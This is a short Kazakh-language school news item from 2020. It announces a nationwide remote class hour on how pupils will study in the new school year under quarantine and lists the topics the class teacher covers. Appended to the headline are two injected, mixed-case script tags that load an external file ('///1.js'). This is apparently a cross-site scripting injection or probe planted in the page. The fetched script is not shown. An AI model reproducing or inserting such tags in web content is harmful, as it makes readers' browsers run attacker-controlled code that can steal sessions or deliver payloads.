21 тамызда еліміздің барлық оқушылары үшін жалпыреспубликалық бірыңғай сынып сағаты өтеді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.08.2020
📌Жаңа 2020-2021 оқу жылында карантиндік шаралар жағдайында білім алушыларды оқыту форматтарымен таныстыру мақсатында 21 тамызда «Мен жаңа оқу жылында қалай оқимын?» тақырыбында еліміздің барлық оқушылары үшін жалпыреспубликалық бірыңғай сынып сағаты өтеді. 
 
📌Сынып сағаты қашықтан өтеді, ал өткізу уақытын мектеп әкімшілігі бекітеді. Қалауы бойынша ата-аналар балаларымен бірге қатыса алады.
 
📌Сынып сағаты барысында сынып жетекшісі келесі сұрақтарды түсіндіреді:
1️⃣Карантиндік шаралар кезіндегі оқыту форматтары;
2️⃣Қашықтан білім алу барысында пайдаланылатын интернет-платформаның мүмкіндіктерімен танысу; 
3️⃣Мен және менің денсаулығым (гигиена негіздері, физикалық белсенділік);
4️⃣Жаңа оқу жылында білім алушыларды бағалау жүйесі;
5️⃣ Интернетте жұмыс істеу ережелері, ақпараттық қауіпсіздік. 
Просмотров: 626


Пікір қосу



Деректерді қолтаңбаға қосу